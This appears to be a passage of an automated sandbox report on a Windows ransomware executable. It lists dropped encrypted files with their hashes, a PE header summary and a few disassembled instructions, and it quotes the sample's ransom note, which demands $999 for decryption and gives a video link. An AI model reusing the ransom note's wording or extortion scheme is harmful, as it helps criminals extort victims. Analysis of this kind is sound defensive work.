                                                                                                SHA-512:CE3A7473D2711225FB12B29C4B37EB79B9E2D7C74AD6D8E85FF5C34E75711AF8B7B92E1D24DF8DBDFC6E10B9302285E1509F771279AA6E760B54FEB0CFC252B8
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.84391757439474
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FmIqk/tqFRIHTrn6x/VYr0QdPnNQQuMQcQC+FXZl15P6sOHOMFaEmMHhC+9UhcfG:FzF/t0mHTKi0Qd/4W+NzrU1ThbOh6Shx
                                                                                                MD5:A3D10A3083FDE888097FD3D6B312A455
                                                                                                SHA1:47EC4595947553C075ADEB3444233B8A29E97F9C
                                                                                                SHA-256:EABB564365E8BB5F0A674CCD9BBB00864E9A8603B094F100BD88A042C76D08DC
                                                                                                SHA-512:CA9755F17A9E286A316E019ADDC51E9865EA14DF28323A5CE295E73904F98DC4D049F3C7C4BF9E679E71AEE754324ACB2E8804491DE442C90285913D29B897C8
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.858697233205164
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FSY6MvctrWqEHGTK7Mt7lGs4sk1RMddm58c3y0uLAb8nwCcqRS6/TAOpVhXfzIbD:FBlEtiBOvQs/S6dm53+LPwCnLTAEfzSD
                                                                                                MD5:37B30D9449C076F44B0A0BC559DB5712
                                                                                                SHA1:213D94038945513577233A2E1AFD3B7A1399056B
                                                                                                SHA-256:EC7927B28756865564AA42CEDAD5D425F564DBBA57A01431B230096DE7EC529C
                                                                                                SHA-512:427060FA9F0AFADD1C7A6AA870AA8D9A270C958673169F1DA36E32797BB561583059ABE6F0F32D74189370A90EDB9FE37A0DD3FC1E11C61A9732145BDC2117B1
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.846109655496152
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ToouqwM64djtTzmVSluPfxe3Wy2e2GkNwdQDKU1d0AHS6K/HaVL9B5cK94kXfzIX:TLhyItTzJlWe3Whe2IQDL1d0efK/YL9M
                                                                                                MD5:4F9589EBD3154D6FD5166B0F7BAD37B1
                                                                                                SHA1:272AE581BEFB85689909BFD22F8A594F3BAA2F88
                                                                                                SHA-256:A67E60DD0F7208C73E316B493B7E404545DA0A8BFCE7C7C8E59ED8AA0E74E472
                                                                                                SHA-512:A950EDF154125A773A7AAABC79F5104CA134DBAE1E4CD0E8240B972570578353685F067095290A9DCFE90753C5982E96227083D90A7D78635140C89E1C963A01
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.845561417884031
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qzbV1U0LcNDDEqA1rwvL0TZmA+nOtXrmYYkNinucSinxLt0dY/XfzIbD:OkrnxjcdrVYPn7SG7fzSD
                                                                                                MD5:8596F332E7017CDA230B371385D53FD3
                                                                                                SHA1:D9EEE97830DC43EFE88BB277EA54AE67009619BD
                                                                                                SHA-256:4175D36AF85768D16A02517DD5E77DE9DB285EDC20E39BC742753246E97393BD
                                                                                                SHA-512:AA8BD23A09A17811B6ADD86F6592400C6E10E08FCC421A34F7BE3030C4690F4815095211CD4E7790CD2D0D174532D506746D11DE0544DF6D42F546DD08D5636C
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.856163672591854
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:TlwKy/I3qQNZdZ9tDXIJQ9ynnI/wJcbqptBb1mIiPqz2hbLmO1iXfzIbD:+KyWqSb/ZYJaynrqbyqIiyz2tL/0fzSD
                                                                                                MD5:3CDB702909E3CB65C58DE959A13FC92A
                                                                                                SHA1:FED6B48CA81B1D58A1A5FB0632A2DEADE21C3D31
                                                                                                SHA-256:456DB3515359B3EDCEB3542DF3DC20F5A95D45F12B334BD9D3A3414ADBDB4DF0
                                                                                                SHA-512:B92D3E3C7E552E82350883A5E7CEF7DD1ED27E8200194D969D48766163FC9E4D1A3D0F6485CA72A95191A9158FDBF2681F9B5A595A2722888104B214C6EAFA53
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.85243471639676
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:rRivkwSaXpvZ4Vz6NDqGcKqpoNR8Cey9kMqrIZF56KnwVq5GRIJ/NGvUhbSXfzIX:Iv5vvZ4st3VCS8C59rqr26Sy9w/+eQf2
                                                                                                MD5:CEF14B1A3622500965C777C4184877F5
                                                                                                SHA1:AC4FEACA5ACF0219E799F97C57D637D420ABAABE
                                                                                                SHA-256:876C1CF725A2AAE68635E1EFD71C8962F41B9271A4DB565669600E2C6A7D9B86
                                                                                                SHA-512:53E488D3731B083E4638B8FA34E47EC48A1DE5807DFE6E6FC193E07AFE926FF99BE777133E4A12437A66B728FC3029F01D40D63F0CE0427F0BA312831D6C39B3
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.83737782596491
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:iAsq83bIGv6fgXFG133p+5HPzvwD4+U71c3Td/MnrDDh93I2EaiFgMu4wHXfzIbD:T0D6AGKPzoDUwMnrsZgMu4ofzSD
                                                                                                MD5:FDF21DCC99C04D32D88F9A292AC91281
                                                                                                SHA1:96CB8AC0D4FCEAF77D17E258C282CB3D893A48C1
                                                                                                SHA-256:0688ECA88CD00E01B24CB7F441617E01AA87DA28F787B9F2F7E324A30E06A275
                                                                                                SHA-512:6D44E029B93F5CD392B37B5F087B2E38229A4C0855AA67E7D5BFCD0A74908E120A40D7CB831ED968243368AD8BB68B005973B009E45472EC6F2071A93E90A4BF
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.853209792639393
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:+JQ042xgEdf6knSStgyKx/TvfxbtkaA+CX75HnYKw4sP6ZmfXfzIbD:+Jd8YSegygrfxxkaMX7JfwHfzSD
                                                                                                MD5:C080C46AFA87DF8751D0370A91E24E75
                                                                                                SHA1:A7C3CB72E836496FE30E23243A7261FEC299391C
                                                                                                SHA-256:6C4554C21E83BCA111D5B085F0C93F53EDF21EC099E8C07DA2AAE76AD394A24B
                                                                                                SHA-512:3886E1D0B1FE2E6BB86857FE14878AEDEECA7AE7C2EF8CD0FA829E143B14C0A0D474B7AC52A75D390134CBDD3C98359B478FE910F03E3A595FEA14DA5B378AE0
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.839243218971457
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Aqf5mmyTQB+IjM8ec7EWod1V8rPEt2cbzQUln7sZGoggAwlXfzIbD:Vf5mmyTWA8ecILV8IgTUxgMPhEfzSD
                                                                                                MD5:71B97CF9BB11D508092BBAA6353D8FE3
                                                                                                SHA1:9D628F684A758BD583ADB98E6B4A4975DE26750A
                                                                                                SHA-256:BB82DBD8C30F3862AC7A973540007A1C77A4D946258DD2433D0FD73E961C19ED
                                                                                                SHA-512:D89E9BBFBFC9CFAB681D952CF57CBF251F1A4082EB3506ED51900152CDCE8AEA41AD73ABCAA1C60C2AFD9296B9C88439726D84B6DDF7F413E8C36C323394A2C3
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.83980224120889
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ooGxOdX7BaWvFumG2aH/J2Wc6x0gGu4ST8YdhobQfiZ2Tox46XfzIbD:ooGqBagLaHjx0gOC88eQux48fzSD
                                                                                                MD5:BD4934831F8560198F97F174E18BFDFE
                                                                                                SHA1:8F956EB10F97823E7E2F3DB9F54A5F207C3E3680
                                                                                                SHA-256:D856642B516B5F9B6C1BDED68276D38B1E143203B63E85ED597B773EE0C5201F
                                                                                                SHA-512:7CC33BFC1AB4E0B15E95CA647291197C822A3CF671F2D83EDC8260C81E2BB156C3514DE4613DBB427C7F01917EA3E33F267A20AE340C456B70531FA30AF0F6D4
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.4022236621007265
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Lq6XFjAttJ71hhBPxTIdnv7GCSKjXEytzIcii9a:+6VjALJvhBPlIBv7RjXfzIbD
                                                                                                MD5:4B533E114B9CEA922C24B6889929E99D
                                                                                                SHA1:1EA5DCED9B95B756B01CF1C2A22BDF1CCB4EF226
                                                                                                SHA-256:5844E7F94B30429A254906CEE8FD6594692F33F876D2C8FA8F1DB135C1149B6B
                                                                                                SHA-512:92A06C234CD530C209D6A419FA3EB32BB77DBB139BB23EB9037F6C27BEAB4EFEC436F1873929CF18A339891C0754B7008E8EE2A7C22F83C3293578CA288AA06C
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):542
                                                                                                Entropy (8bit):7.61943227151422
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:vr9n2Muh7vQzQGDSapHD20TL8FnCSsNCIHpFpz2uXEytzIcii9a:DJUxaQ4Suj2q8gVsS3XfzIbD
                                                                                                MD5:52DA55E8E49B067C36E62E725BC09AD4
                                                                                                SHA1:0111278F41F0E65B09246A3932DB8C9C71173AF4
                                                                                                SHA-256:D8A616ABFD91FAF81AA789B57F14187802354F755061759078ACF67A813800A2
                                                                                                SHA-512:92251C90D4ABBD57B9DE6C8AC607B5B1A2732341A13BC44D1B8965C9581C16FB3347EDEDE624D312CE4E3B993339434B214336DF06486721F1FADE091A1AE856
                                                                                                Malicious:false
                                                                                                Preview:[{000.8%...!.......R.t...Uoo<...&......;....l...E.R....B..Hz...s......u.......4.{.....Pe.R,@s..".2......u.Z;3?.?@A..4...r......p.....9..;.P.....O~8Y.u..u..N.T.Y'bP..0....().....Q#.'....f.L%.u.c.g..K.d.Q64t.1.#f.+.m.=......q.k.^j=.|...s.4.L....G..o...\^1:.).....M@.\..d....t...m.`.#.eN\.Fw...D .x7f...5u;.....~.y..XQ.@.....BG..MC^.....#.....7..R0!".....{.h.ij2\....a8'...@.=..T_......*D.........n.ve.:N>...*.:0HF.:-.C~.........O..y7,=......>My8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):447
                                                                                                Entropy (8bit):7.388070726496588
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:bBngjhMrgrN+CsewM1aVDWBXEytzIcii9a:9bg5bCM1uWBXfzIbD
                                                                                                MD5:C79F52440F7D3745BCA9993A87355676
                                                                                                SHA1:D30C406ECE3A69257FD1F0B345FBEB775CCE96C3
                                                                                                SHA-256:DB6BB77F94DC975F8A10473A700E9B857D07621C1109200290A3886ACA076BA2
                                                                                                SHA-512:E1AF8ADE8B7E9A8EB762AF70F9227B1E0058AA28BEDCC733CBD807E9DF38988E30875BB832A0294C20B7E1836FBFE1AA9C0ED74EF88494676C80479BE8551C00
                                                                                                Malicious:false
                                                                                                Preview:[{000...].}w..&9j.3.Gs#..P..A>..h...'8.-`p.....Y.H!I..c..-.2.b.....t...a5.zqwy....n8&I<.b..42A.p.4........*.j=.C.[3.......%t%Q.x..H.m.~.....g.Hw+..J.h..t......?74#.B.....6...x>...+.....BE.3.).>.Jk[.......1.l.1.6~.|....}..c.^..1...w>.g..,K...6K.~..P..D.+......1k.}..i.q...(C,..n....tp..S.-..OG...l...<....P7...G..:..r.c.=..GO..f^b..G.D...kN9.Zl...E.J8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.4381582635504415
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DIyvVExO2tmch3VOJ2bR/bHV6vIPNPpGXEytzIcii9a:fdE424MOJ0REa6XfzIbD
                                                                                                MD5:6628ED88E51CA482EF22DC303B095591
                                                                                                SHA1:AECDF583D8936C580CD9DCBF8B5C706B728BC1F3
                                                                                                SHA-256:05D71DB85F54C11976C31C65CC8F4D9A2CE6D85EEB8FB5CDA534DEDEC164DBE7
                                                                                                SHA-512:39E088AB65AC8CD1D36791DE9DE88E8223CC5F8CDF1C7363E991A91E9BB9FF4A9043E38B84A292068E5FD71D6479024F1DD4E4CA6CF16F1D0514D2FD75166B38
                                                                                                Malicious:false
                                                                                                Preview:[{000..o.s'..i=j...qz...#^a.~..60.....T..O....Tfw.....-..L..I.i@..+`......5.....*e&k...:.Uq..L.a8..8...M.J'YDx..e..>.R............Z..k...I...IO...|....j2....."+..<g......e...".L..ayI...... ..j.S...w=.N.inC\F.?....jU.....5.<_..T3-i\...|.a>;.pp.#.RBtA.K1..*>.K.*A...................1..&....&...Z...H.....u..l....RM.f.j.{W...R.y.%.%...;<W|Ocyi.....[yz.8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):443
                                                                                                Entropy (8bit):7.464196144135486
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:4IlqdvXNHLsDcWf8oQqT8FX7jCs+XEytzIcii9a:44sFvSo57es+XfzIbD
                                                                                                MD5:A998EA323B108E5A2A81B469041ADBDA
                                                                                                SHA1:919AF6E0C1E25024016375313EEFCCDC49C96704
                                                                                                SHA-256:67E1B6382A8C317C342C6FCFD9B52E49A001205B6F5733E9D8F953DEB26F9489
                                                                                                SHA-512:1F5A5783DCFA8752E1A5CEE8374D9400B8B213277EB17DC31963AED1A2F976F2591331C8C74D6106EA4D72C1B062B17FEF7ABBA375347E2BC1603662BD5EF220
                                                                                                Malicious:false
                                                                                                Preview:[{000r7..4R.TZ{1G.R.y..|.....t..A./H_..2[..M;...$.[...^.yI}.s.".u@..O [..6Y..6....8.....bk..;.{9.&.....<S.>...H..lrYo}.n..u.4]}mD.ma9r}..A.B......U../.~...@...!y~.3.....t%Ri.@.U?6.L.,.c.".../.szA.eT.x(.......;~.........x..f.....\g]U.k...."w..=..~......[.p}.)..gDJ..`$....!.m..X...U?..Yr'...o......"z,...C.2...;...0..A.......B...fb>.w.Ni.q.,...B....8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):446
                                                                                                Entropy (8bit):7.463495116475813
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:KvXVLhZ5z9aHWckyCDUfzW9j6mSQ00JtXEytzIcii9a:aLH5gHWcL4UfzWw43JtXfzIbD
                                                                                                MD5:DBC2FFF44F7B74FE5EAAA285F59C9AEE
                                                                                                SHA1:43CAB60DB0DEC0FD75C0C6ED03FD8DD9C6D6A76D
                                                                                                SHA-256:331D7075392AA2889B548266A12ABEB804F78F86C96E769481C54BDF76B087B6
                                                                                                SHA-512:7CBD604B52CEA0FE9A765CD5404007035A894C87882E649D1740E19B3FC2250BFE61E2BCEEFEFE0A75D24D348C8202DF3892FD9DAE39165614CCF7BE56132AD1
                                                                                                Malicious:false
                                                                                                Preview:[{000.*......ab..Vp.n.FS....7)bS..`O.zu.j.+...TJ.:...Y..}..rM.b>,.l....X....._.sZ.b..j.k..j.h..........4..7...".....e.I\O..@v..;9......(.LK...(@Y..s.....}C. ..KR.>N.g3.sS..t[.....;~41:....<.@srI|...2..j.b......w../.. >..).u..nwhI..iN..'.i.@8..~B%.(.k3.3..9..?.....).p.`NLd.....d!.v...LIK.=.DaZ.f'4.lx....fkL<.......I....../_k.(.G...n.E..2..x..X8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.444655137768246
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:4mEht9yLWzCkUZGgZX7ypuxLUE7wEQXEytzIcii9a:et2rZCuNUEuXfzIbD
                                                                                                MD5:196D2A262CE4884D77B032D27A84B4B0
                                                                                                SHA1:AD33A133196F7C75F0C909381142C1785F3B7240
                                                                                                SHA-256:BA04B18D8D8B384EF23D51734F6506864E719892A99173D661A02F223EFF9EE1
                                                                                                SHA-512:38867809405C37CAE0BA3DAB28E513B280ED13D3552F927C7747F16D1931B9FF9EE7DE4265E00697428F9FFD6EC1F52CD93CD091E9E1BEFF5EA64DF5FCA71D4F
                                                                                                Malicious:false
                                                                                                Preview:[{000....x..xC..b!..)4..l}.N...g.u.S.v.T.._...."...D...iN........6`....*....1....$..}..Ld.w.=e..Q.b..`.e.g..0C{%.c|.8,9....{...K.H.."..fE..B:_.*.}.T.....b.4{.l]ck,...07..aw.J...M..A.1...\..#rp..8..F.......:..;i...G..V~.I\@So5n.N......+W.;8...(o.....z.......u.4......(s.....=+.C.........U.,dq.G8".|...x..."..h.Y}..b7.4Z..d.a/F.<:...M3.|..g.SU.F8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):446
                                                                                                Entropy (8bit):7.369340576465276
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:v9SO0iksMwIByrKxljdQaVJmWWrvkK7fXEytzIcii9a:vDJkcGWa3mPrpXfzIbD
                                                                                                MD5:1D99C1D9CA004E85495FEA5F20424848
                                                                                                SHA1:8897FD14420BB9E49DDEB83639D1D97C0CF07CDB
                                                                                                SHA-256:C51767B5277FBA055B26C26695249DC43A3D4E3916E4CC6D1B22EDCAB680D297
                                                                                                SHA-512:02B6FA2519931ACD22F54C2D346882B36CAC00C1B72085AAA08B727B66C485996622D36DF55E83F401DFD90263AF18B5CF72997AF339A1A9CCB8F96D8C74C7D1
                                                                                                Malicious:false
                                                                                                Preview:[{000q...D1.Vy.(.R...W.%.:...%U..9....y..:.....*.....\.1......}a...(j..9.Q (......." /.....6.F.y".....?W.8..<.0.G0.O...E...".i..H........a\Dh.....TZ._..$.7;..o..B.......e......{],8x..*..#^...{..z.+*[o.....-I.VR>A-6[*.5...|2z.."Q.E........&.!.<."]../..D..G.[...y....1:.U..G...n.F......d....9g...].w{E..YJ/..9..U...t..R".I.d.u. ....../..7.1G8X*.G[8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):448
                                                                                                Entropy (8bit):7.447429646893992
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:dN1jh9NVhF4RQwP4I8JAHuelofe/NXcvvXEytzIcii9a:Njh9z4izIunfoIvXfzIbD
                                                                                                MD5:9727E5DDE83068A779CE0FA270D593E4
                                                                                                SHA1:91ED92FF9AF673563761EA57C3788FBC62DCA83A
                                                                                                SHA-256:C6CC68081FCB39C083EC954F0684C20C0E4F4AEAD1AB1F0121936BBC39285FD2
                                                                                                SHA-512:C671A9D62EBD46612DD651EA5FB3E74133253ABFCDAAB26386C3B50C6D54A52B9F70D4B19A068A4D1C071821AC0EE9F991F67960A27AA33957BCE3E113EA5CDE
                                                                                                Malicious:false
                                                                                                Preview:[{000tB|....(.K6..M.._:x.w."......H..........x.,`..f.......V..m..c.h ..i.|...d~..u..Y...,x......g.......?..5%.n].^.f..~.NQ.}..c......o...'.L`%r....I^..QD..+..*.v....o.z.nrP...HZ5H...6D5.6j..J.|z4~...9.ao....3.n..Y..l.K...u.X.........}.f.?..a>...1....!...."e...#....G..-|..Z.Q...7.9o..'........w..q2....x....&.y,..W[M.6q..v..v.h.uz.._s/..{.9..h.F}|.%../y/./ph8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):446
                                                                                                Entropy (8bit):7.3725283698548525
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8wcUpjByvIDVb75dgrfcR0a3EDStHXEytzIcii9a:uUpdyADVb75dkfw0a3EDKHXfzIbD
                                                                                                MD5:C91AB2AF0065547487A59FA390C5E138
                                                                                                SHA1:D40B85CD64BD2F017B2459E3B3E4EF971B43117C
                                                                                                SHA-256:72DEBBB3ADB0FBBD3A3E33A0E61947911D5186A18BD3C54EF767192FEB121842
                                                                                                SHA-512:9278258F203C7358C520A12356BD5A7029CE7D58E480E9A07BB7854199A1B5A44470D210F7C37359C5757AF0B3E7D71A5F05E1822DFE199C4B4034406AAA7BFB
                                                                                                Malicious:false
                                                                                                Preview:[{000P.M.......z.-.9..-@]s.....j7..L........`...................7.,..oT......WR@....}.9...Lz...I.....r..D<._aT..5.4.Go......./.7.<0._..~p.`9..k.v......;.{.|..VEnu.T ..pH...J.%h.D5.J...Zh.....aW.....~..!C?.+....%.}ex>.+/...../.....%.....0...z.......Tmx...x,.....G../.P`.........k.']......GE........z..d..t?.A.C.=.f:!2RW...@L....A.f}...Q...?/#.Jo.88JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1193
                                                                                                Entropy (8bit):7.827466608163158
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:jWwQXQ1fzyOu+QHGMpghjPfIkSRBenTdRKTMe0OUDPRiXfzIbD:jWwQgFzyOu+gGMpgVoVR0dET30OUF0f2
                                                                                                MD5:C24508CB64CCC417094D8765C13F709E
                                                                                                SHA1:589DCA1959CA1966299BCB7A60E8C22F0339F060
                                                                                                SHA-256:E1D153029CB157DBB43DB8AEBE2AF932AD4D95FA29EB90C7C29B23C94551ACEA
                                                                                                SHA-512:64CE41BEBEBB2F394A838110E389F42DB84F8438B81E40464BDE9C2BDFCCB78D5A69F39AF0D4939A0BD9C4678B952A26D7598263F7520E8C5348D2CACE467B10
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1381
                                                                                                Entropy (8bit):4.894754314393066
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNzk5LmFRqrs6314kA+GT/kF5M2/kJw31:WZHfv0pfNAU5WEYNzoLPs41rDGT0f/kS
                                                                                                MD5:F15A25EF13B3CE75045B3DF6EA5E17D6
                                                                                                SHA1:0D0B0F5B56C116B60493629C439F6F6E3C71A034
                                                                                                SHA-256:E0354E011380D81532488C5F04748521FAB0A4E4F10979DE977694BE6864B35F
                                                                                                SHA-512:06BFEACEF2F073F9EDE529DDAF12F9C095BE9B4A4F053163493EFF7C1AE357C65732AA0ADD34AC6FA6E32E22D16FE0F317323B82D4A8E08199BEB741C0E60DE4
                                                                                                Malicious:true
                                                                                                Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.699125946845374
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:mU2p71KMss.exe
                                                                                                File size:781'824 bytes
                                                                                                MD5:e9ff14a975f084f01373d468c0b91a16
                                                                                                SHA1:302d4b9f88ae7b085b56661774d6805156039924
                                                                                                SHA256:f6a6765642f0f8c4b81f45d4e1a9f65505432bbf4c249fa3c96b82d9c712effe
                                                                                                SHA512:4c7965f1f1a123b57ab9ca49cd4b3db35c9d98086eec4cdd297b9b706d68dac25183d052934f564f935459c49471c953453202a99b8f0d62e03b0626d8c41ce0
                                                                                                SSDEEP:12288:M2dc5bz6tqdDlvGkNwikL95whi6SY7Mf6cMFqNjOjNiaUORnV77J1BDg:uWqdBpNwJLsi6v7iMpxDV77J3s
                                                                                                TLSH:2AF402027ED2C4A9D523DB72452099A0C67FFCF647258D27B34C13CE5E385E08A6E7A6
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bD}.&%..&%..&%..+w..8%..+w..Y%..+w...%../]..!%..&%..K%......'%..+w..'%......'%..Rich&%..................PE..L....:.d...........
                                                                                                Icon Hash:412955454145610d
                                                                                                Entrypoint:0x40433f
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x64EC3A8A [Mon Aug 28 06:11:22 2023 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:5
                                                                                                OS Version Minor:1
                                                                                                File Version Major:5
                                                                                                File Version Minor:1
                                                                                                Subsystem Version Major:5
                                                                                                Subsystem Version Minor:1
                                                                                                Import Hash:da85065239035ee146657c2492fb98d0
                                                                                                Instruction
                                                                                                call 00007FEB0CF7393Ch
                                                                                                jmp 00007FEB0CF6DE85h
                                                                                                push 00000014h
                                                                                                push 004199F8h
                                                                                                call 00007FEB0CF702F0h
                                                                                                call 00007FEB0CF73B0Dh
                                                                                                movzx esi, ax
                                                                                                push 00000002h
                                                                                                call 00007FEB0CF738CFh
                                                                                                pop ecx
                                                                                                mov eax, 00005A4Dh
